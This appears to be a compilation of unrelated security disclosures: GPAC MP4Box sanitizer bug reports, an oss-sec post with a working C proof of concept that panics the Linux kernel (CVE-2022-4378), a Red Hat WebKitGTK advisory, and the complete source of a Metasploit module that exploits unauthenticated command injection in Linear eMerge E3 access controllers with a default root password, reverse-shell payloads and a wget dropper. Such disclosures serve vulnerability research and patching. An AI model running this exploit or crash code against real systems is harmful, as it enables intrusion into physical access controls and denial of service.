GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is has an integer overflow in isomedia/isom_write.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

    MP4Box - GPAC version 2.1-DEV-rev644-g5c4df2a67-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

    ./configure --enable-sanitizer
    make
    ./MP4Box import -cat iof.mp4
    

    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing NAL unit type 32
    [HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12
    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing Sequence Param Set
    [HEVC] Error parsing NAL unit type 34
    [HEVC] Error parsing NAL unit type 0
    Track Importing HEVC - Width 1 Height 6 FPS 488447261/488447261
    [HEVC] Error parsing NAL unit type 25
    [HEVC] NAL Unit type 25 not handled - adding
    [HEVC] Error parsing NAL unit type 32
    [HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12
    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing Sequence Param Set
    [HEVC] Error parsing NAL unit type 34
    [HEVC] Error parsing NAL unit type 0
    [HEVC] Error parsing NAL unit type 32         
    isomedia/isom_write.c:4931:87: runtime error: signed integer overflow: 1852736474 - -1953749291 cannot be represented in type 'int'

CVE-2022-47660: integer overflow in isomedia/isom_write.c:4931 · Issue #2357 · gpac/gpac

A stack overflow flaw was found in the Linux kernel's SYSCTL subsystem in how a user changes certain kernel parameters and variables. This flaw allows a local user to crash or potentially escalate their privileges on the system.

**oss-sec mailing list archives**

_From_: Kyle Zeng <zengyhkyle () gmail com>  
_Date_: Fri, 9 Dec 2022 09:11:25 -0700  

Hi there,

I recently found a stack-based buffer overflow in the Linux kernel,
which can cause DOS and is potentially exploitable. This bug affects
the following kernel versions: latest, 6.0, 5.15, 5.10, 5.4, 4.19,
4.14, and 4.9. I already contacted security () kernel org and helped them
patch the vulnerable kernel versions.

# Vulnerability
The vulnerability is caused by a missing check on user input. More
specifically, \_\_do\_proc\_dointvec function has the following snippet:
~~~
if (write) {
    ......
    if (left > PAGE\_SIZE - 1)
        left = PAGE\_SIZE - 1;
    p = buffer;
}
......
if (write) {
    left -= proc\_skip\_spaces(&p);
~~~
In this snippet, \`buffer\` and \`p\` represent a buffer containing
user-supplied input and it can contain more than 1 page of data. It
first truncates user input to 1 page (by marking number of bytes
\`left\` as 1 page). However, in a later call to \`proc\_skip\_spaces\` (a
function that assumes the argument is a NULL-terminated string), it
forgets the "up to 1 page" limit, processes all user input, and
calculates how many leading spaces are there in the user input. In the
buffer contains more than 1 page of spaces, \`left\` will be set to a
negative value. The negative value will then be passed to
\`proc\_get\_long\` and the least significant 4 bytes will be used as
length for memcpy that copies data to kernel stack, causing
stack-based buffer overflow: (the check on \`len\` won't work because
\`len\` is signed)
~~~
static int proc\_get\_long(...)
{
    char tmp\[TMPBUFLEN\];
    int len = \*size;

    if (len > TMPBUFLEN - 1)
        len = TMPBUFLEN - 1;

    memcpy(tmp, \*buf, len);
    ......
}
~~~

# Patch
The patch consists of two parts:
1.  refactor \`proc\_skip\_spaces\`, instead of assuming the argument is a
NULL-terminated string, it now will process data up to a limit. The
patch can be found here:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bce9332220bd677d83b19d21502776ad555a0e73
2. fix the signness issue in \`len\`:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e6cfaf34be9fcd1a8285a294e18986bfc41a409c

# Trigger
The bug is triggerable by non-root users if they have access to
user-namespace. A proof-of-concept crash program that causes kernel
panic is attached. To run the POC, you need net namespace. In other
words, you can trigger the bug using the following command: \`unshare
-rn\` and then \`./poc\`.

Best,
Kyle Zeng

===========================================
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>

int main(void)
{
    int fd = open("/proc/sys/net/ipv4/tcp\_rmem", O\_WRONLY);
    void \*a = mmap(NULL, 0x2000, PROT\_READ|PROT\_WRITE,
MAP\_ANON|MAP\_PRIVATE, -1, 0);
    memset(a, '\\x09', 0x2000);
    write(fd, a, 0x2000);
    return 0;
}
============================================
\[    7.150435\] BUG: stack guard page was hit at 00000000eea91c87
(stack is 00000000fdd90d6b..000000009d81213d)
\[    7.152330\] kernel stack overflow (page fault): 0000 \[#1\] SMP NOPTI
\[    7.153467\] CPU: 3 PID: 476 Comm: poc Not tainted 5.10.157 #37
\[    7.154815\] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS 1.15.0-1 04/01/2014
\[    7.156633\] RIP: 0010:memcpy\_erms+0x6/0x10
\[    7.157118\] Code: cc cc cc cc eb 1e 0f 1f 00 48 89 f8 48 89 d1 48
c1 e9 03 83 e2 07 f3 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8
48 89 d1 <f3> a4 c3 0f 1f 80 00 00 00 00 48 89 f8 48 83 fa 20 72 7e 40
38 fe
\[    7.158177\] RSP: 0018:ffffc90000823c68 EFLAGS: 00010282
\[    7.158488\] RAX: ffffc90000823ca0 RBX: ffffffffffffefff RCX: ffffffffffffec9f
\[    7.158932\] RDX: ffffffffffffefff RSI: ffff888007d7e360 RDI: ffffc90000824000
\[    7.159347\] RBP: ffffc90000823d00 R08: ffffffff824158b3 R09: 0000000000000000
\[    7.159802\] R10: ffffc90000823eb8 R11: ffffffff810fb290 R12: ffffc90000823d58
\[    7.160201\] R13: ffffc90000823d47 R14: ffffc90000823ca0 R15: ffffffffffffefff
\[    7.160603\] FS:  0000000001a533c0(0000) GS:ffff88803ed80000(0000)
knlGS:0000000000000000
\[    7.161053\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[    7.161373\] CR2: ffffc90000824000 CR3: 0000000007f3e006 CR4: 0000000000770ee0
\[    7.161769\] PKRU: 55555554
\[    7.161924\] Call Trace:
\[    7.162076\]  proc\_get\_long+0x90/0x190
\[    7.162286\] Modules linked in:
\[    7.162463\] ---\[ end trace d4a913b02029fee9 \]---
\[    7.162722\] RIP: 0010:memcpy\_erms+0x6/0x10
\[    7.162952\] Code: cc cc cc cc eb 1e 0f 1f 00 48 89 f8 48 89 d1 48
c1 e9 03 83 e2 07 f3 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8
48 89 d1 <f3> a4 c3 0f 1f 80 00 00 00 00 48 89 f8 48 83 fa 20 72 7e 40
38 fe
\[    7.164044\] RSP: 0018:ffffc90000823c68 EFLAGS: 00010282
\[    7.164370\] RAX: ffffc90000823ca0 RBX: ffffffffffffefff RCX: ffffffffffffec9f
\[    7.164780\] RDX: ffffffffffffefff RSI: ffff888007d7e360 RDI: ffffc90000824000
\[    7.165188\] RBP: ffffc90000823d00 R08: ffffffff824158b3 R09: 0000000000000000
\[    7.165595\] R10: ffffc90000823eb8 R11: ffffffff810fb290 R12: ffffc90000823d58
\[    7.166002\] R13: ffffc90000823d47 R14: ffffc90000823ca0 R15: ffffffffffffefff
\[    7.166431\] FS:  0000000001a533c0(0000) GS:ffff88803ed80000(0000)
knlGS:0000000000000000
\[    7.166889\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[    7.167218\] CR2: ffffc90000824000 CR3: 0000000007f3e006 CR4: 0000000000770ee0
\[    7.167661\] PKRU: 55555554
\[    7.167820\] Kernel panic - not syncing: Fatal exception
\[    7.168333\] Kernel Offset: disabled
\[    7.168544\] Rebooting in 1000 seconds..

**Current thread:**

*   **CVE-2022-4378: Linux kernel stack-based buffer overflow** _Kyle Zeng (Dec 09)_

CVE-2022-4378: Linux kernel stack-based buffer overflow

Red Hat Security Advisory 2023-0021-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:0021-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0021  
Issue date:        2023-01-04  
CVE Names:         CVE-2022-42856   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* webkitgtk: processing maliciously crafted web content may lead to an  
arbitrary code execution (CVE-2022-42856)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2153683 - CVE-2022-42856 webkitgtk: processing maliciously crafted web content may lead to an arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
webkit2gtk3-2.36.7-1.el9_1.1.src.rpm

aarch64:  
webkit2gtk3-2.36.7-1.el9_1.1.aarch64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.1.aarch64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.1.aarch64.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.1.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.1.aarch64.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.1.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.1.aarch64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.1.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.1.aarch64.rpm

ppc64le:  
webkit2gtk3-2.36.7-1.el9_1.1.ppc64le.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.1.ppc64le.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.1.ppc64le.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.1.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.1.ppc64le.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.1.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.1.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.1.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.1.ppc64le.rpm

s390x:  
webkit2gtk3-2.36.7-1.el9_1.1.s390x.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.1.s390x.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.1.s390x.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.1.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.1.s390x.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.1.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.1.s390x.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.1.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.1.s390x.rpm

x86_64:  
webkit2gtk3-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-2.36.7-1.el9_1.1.x86_64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.1.x86_64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.1.x86_64.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.1.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.1.x86_64.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.1.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.1.x86_64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.1.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42856  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7Wqj9zjgjWX9erEAQg9lg/+MOfUiSATG58e1aJdZzVtFA5hv1x1PWC3  
/F+rP2/89vYYk/PLOSjySGdelAEYgw7Uq8UW6sPMkleTRvyakUaYhE9joubGcYNM  
XKAtZDbLVGVzQxEggI7VxHRaFZvyMNWItb8SKloiD14EPuuI/W32g9Seep3L6xZ3  
ufdqgmCyVLILPRMREXYZgfYo0PsJqLL0qOwfL4KWhh6BDQpgdLvndjWzbfZiVKzO  
Rnr/x7o62SiEtgcSCCowoR35/NEJkzoCnbrD91UlgFUKby1siTbSr1KItPbP1y7L  
QiWSOBWph5pVZHKAiThYFHmGNbL04s10D3gVhB+MKZ+6AO/NjdmlU27Rg49ps9GV  
yLam6qcuWhNKbMafeOHleBeTRizSWmnKVefOWil/2FnNnzFhcEKJ3dILzjXIQSB/  
WyFAUqYG8qkha2buYpx4zEjq20jLngQQ/s00fDAnJlsjasMhyBLSGy+fvgmaQ6wN  
xs7gYg9+ouhnA3qJytkcQXj9Qaryvf9YmmY6uBLa7F5BUwtJ/w3E9n4pVFNmqEFq  
GD1SabvR9BfwO/7wQgyIBKSFMSRUtXpGV1MZp+FaQFKgJ/7Bgh0wNOy2t5MstPEf  
jvzsYdVUFZRfYwUNMNyA7Vsm6E2cnE52cLNEKuBxRdESAO11qrNzPIkYaF9DTmW3  
jFzs9D1IFKw=  
=FE4s  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0021-01

This Metasploit module exploits a command injection vulnerability in the Linear eMerge E3-Series Access Controller. The Linear eMerge E3 versions 1.00-06 and below are vulnerable to unauthenticated command injection in card_scan_decoder.php via the No and door HTTP GET parameter. Successful exploitation results in command execution as the root user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/stopwatch'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Linear eMerge E3-Series Access Controller Command Injection',        'Description' => %q{          This module exploits a command injection vulnerability in the Linear eMerge          E3-Series Access Controller. The Linear eMerge E3 versions `1.00-06` and below are vulnerable          to unauthenticated command injection in card_scan_decoder.php via the  `No` and `door` HTTP GET parameter.          Successful exploitation results in command execution as the `root` user.        },        'License' => MSF_LICENSE,        'Author' => [          'Gjoko Krstic <gjoko[at]applied-risk.com>', # Discovery          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor        ],        'References' => [          [ 'CVE', '2019-7256'],          [ 'URL', 'https://applied-risk.com/resources/ar-2019-005' ],          [ 'URL', 'https://na.niceforyou.com/' ],          [ 'URL', 'https://attackerkb.com/topics/8WUJkci8N4/cve-2019-7256' ],          [ 'EDB', '47649'],          [ 'PACKETSTORM', '155256']        ],        'DisclosureDate' => '2019-10-29',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_ARMLE],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_ARMLE],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 80,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('ROOT_PASSWORD', [ true, 'default root password on a vulnerable Linear eMerge E3-Series access controller', 'davestyle']),      ]    )  end  def execute_command(cmd, _opts = {})    random_no = rand(30..100)    return send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'card_scan_decoder.php'),      'vars_get' =>        {          'No' => random_no,          'door' => "`echo #{datastore['ROOT_PASSWORD']}|su -c \"#{cmd}\"`"        }    })  rescue StandardError => e    elog("#{peer} - Communication error occurred: #{e.message}", error: e)    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")  end  # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution  def check    print_status("Checking if #{peer} can be exploited.")    sleep_time = rand(2..10)    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")    res, elapsed_time = Rex::Stopwatch.elapsed_time do      execute_command("sleep #{sleep_time}")    end    return CheckCode::Unknown('No response received from the target!') unless res    return CheckCode::Safe('Target is not affected by this vulnerability.') unless res.code == 200 && !res.body.blank? && res.body =~ /"card_format_default":"/    print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")    return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time    CheckCode::Vulnerable('Successfully tested command injection.')  end  def exploit    case target['Type']    when :unix_cmd      print_status("Executing #{target.name} with #{payload.encoded}")      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_command(payload.encoded)    when :linux_dropper      print_status("Executing #{target.name}")      execute_cmdstager(linemax: 262144)    end  endend

Linear eMerge E3-Series Access Controller Command Injection

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is contains an Integer overflow vulnerability in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8316

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

Integer overflow in gf\_hevc\_read\_sps\_bs\_internal function of media\_tools/av\_parsers.c:8316

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_int.mov
    

    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Warning: Error parsing NAL unit
    media_tools/av_parsers.c:8316:25: runtime error: shift exponent 146 is too large for 32-bit type 'int'

CVE-2022-47092: Integer overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8316 · Issue #2347 · gpac/gpac

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer Overflow via gf_vvc_read_sps_bs_internal function of media_tools/av_parsers.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

buffer overflow in gf\_vvc\_read\_sps\_bs\_internal function of media\_tools/av\_parsers.c

for (i=0; i<sps\_rpl1\_same\_as\_rpl0; i++) {
  u32 j;
  sps->num\_ref\_pic\_lists\[i\] = gf\_bs\_read\_ue\_log\_idx(bs, "sps\_num\_ref\_pic\_lists", i);
  for (j=0; j<sps->num\_ref\_pic\_lists\[i\]; j++) {
	  s32 res = vvc\_parse\_ref\_pic\_list\_struct(bs, sps, i, j, &sps->rps\[i\]\[j\]); // when j == 64, overflow sps->rps
	  if (res<0) return res;
  }
}

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc.mp4
    

Crash reported by sanitizer

    [VVC] Warning: Error parsing NAL unit
    [Core] exp-golomb read failed, not enough bits in bitstream !
    media_tools/av_parsers.c:10710:71: runtime error: index 65 out of bounds for type 'VVC_RefPicList [64]'
    

**POC**

poc\_bof.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

xdchase

CVE-2022-47089: Buffer overflow in gf_vvc_read_sps_bs_internal function of media_tools/av_parsers.c · Issue #2338 · gpac/gpac

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to heap use-after-free via filters/dmx_m2ts.c:470 in m2tsdmx_declare_pid

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

heap-use-after-free filters/dmx\_m2ts.c:470 in m2tsdmx\_declare\_pid

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_uaf.avi
    

**Crash reported by sanitizer**

    Broken PAT found reserved PID 0, ignoring
    Broken PAT found reserved PID 0, ignoring
    Broken PAT found reserved PID 0, ignoring
    Broken PAT found reserved PID 0, ignoring
    Broken PAT found reserved PID 0, ignoring
    [MPEG-2 TS] PID 1863: Bad Adaptation Descriptor found (tag 100) size is 100 but only 93 bytes available
    stream type DSM CC user private sections on pid 32 
    [MPEG-2 TS] Invalid PMT es descriptor size for PID 32
    [MPEG-2 TS] Invalid PMT es descriptor size for PID 5364
    Broken PAT found reserved PID 0, ignoring
    Broken PAT found reserved PID 0, ignoring
    Broken PAT found reserved PID 0, ignoring
    Broken PAT found reserved PID 0, ignoring
    Broken PAT found reserved PID 0, ignoring
    [MPEG-2 TS] PID 1863: Bad Adaptation Descriptor found (tag 100) size is 100 but only 93 bytes available
    stream type DSM CC user private sections on pid 32 
    [MPEG-2 TS] Invalid PMT es descriptor size for PID 32
    [MPEG-2 TS] Invalid PMT es descriptor size for PID 5364
    =================================================================
    ==583780==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000004548 at pc 0x7fa6cb05f685 bp 0x7ffc93e21020 sp 0x7ffc93e21010
    READ of size 8 at 0x607000004548 thread T0
        #0 0x7fa6cb05f684 in m2tsdmx_declare_pid filters/dmx_m2ts.c:470
        #1 0x7fa6cb05f98a in m2tsdmx_setup_program filters/dmx_m2ts.c:592
        #2 0x7fa6cb06245b in m2tsdmx_on_event filters/dmx_m2ts.c:876
        #3 0x7fa6ca9507d4 in gf_m2ts_process_pmt media_tools/mpegts.c:1779
        #4 0x7fa6ca9507d4 in gf_m2ts_process_pmt media_tools/mpegts.c:1132
        #5 0x7fa6ca9439b6 in gf_m2ts_section_complete media_tools/mpegts.c:624
        #6 0x7fa6ca9452af in gf_m2ts_gather_section media_tools/mpegts.c:755
        #7 0x7fa6ca94a532 in gf_m2ts_process_packet media_tools/mpegts.c:2721
        #8 0x7fa6ca94dd68 in gf_m2ts_process_data media_tools/mpegts.c:2813
        #9 0x7fa6cb05a250 in m2tsdmx_process filters/dmx_m2ts.c:1420
        #10 0x7fa6caf29bcc in gf_filter_process_task filter_core/filter.c:2750
        #11 0x7fa6caee9af3 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #12 0x7fa6caef63ee in gf_fs_run filter_core/filter_session.c:2120
        #13 0x7fa6ca938fd1 in gf_media_import media_tools/media_import.c:1551
        #14 0x55f87208daec in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #15 0x55f8720423db in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4508
        #16 0x55f8720423db in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #17 0x7fa6c7ec3d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #18 0x7fa6c7ec3e3f in __libc_start_main_impl ../csu/libc-start.c:392
        #19 0x55f87201ecb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4)
    
    0x607000004548 is located 8 bytes inside of 80-byte region [0x607000004540,0x607000004590)
    freed by thread T0 here:
        #0 0x7fa6cda1ec18 in __interceptor_realloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:164
        #1 0x7fa6ca0aff20 in realloc_chain utils/list.c:621
        #2 0x7fa6ca0aff20 in gf_list_add utils/list.c:630
        #3 0x7fa6caed06d0 in gf_props_set_property filter_core/filter_props.c:1098
        #4 0x7fa6cae8a35d in gf_filter_pid_set_property_full filter_core/filter_pid.c:5411
        #5 0x7fa6cae8a35d in gf_filter_pid_set_property filter_core/filter_pid.c:5418
        #6 0x7fa6cb05c6b3 in m2tsdmx_declare_pid filters/dmx_m2ts.c:454
        #7 0x7fa6cb05f98a in m2tsdmx_setup_program filters/dmx_m2ts.c:592
        #8 0x7fa6cb06245b in m2tsdmx_on_event filters/dmx_m2ts.c:876
        #9 0x7fa6ca9507d4 in gf_m2ts_process_pmt media_tools/mpegts.c:1779
        #10 0x7fa6ca9507d4 in gf_m2ts_process_pmt media_tools/mpegts.c:1132
        #11 0x7fa6ca9439b6 in gf_m2ts_section_complete media_tools/mpegts.c:624
        #12 0x7fa6ca9452af in gf_m2ts_gather_section media_tools/mpegts.c:755
        #13 0x7fa6ca94a532 in gf_m2ts_process_packet media_tools/mpegts.c:2721
        #14 0x7fa6ca94dd68 in gf_m2ts_process_data media_tools/mpegts.c:2813
        #15 0x7fa6cb05a250 in m2tsdmx_process filters/dmx_m2ts.c:1420
        #16 0x7fa6caf29bcc in gf_filter_process_task filter_core/filter.c:2750
        #17 0x7fa6caee9af3 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #18 0x7fa6caef63ee in gf_fs_run filter_core/filter_session.c:2120
        #19 0x7fa6ca938fd1 in gf_media_import media_tools/media_import.c:1551
        #20 0x55f87208daec in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #21 0x55f8720423db in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4508
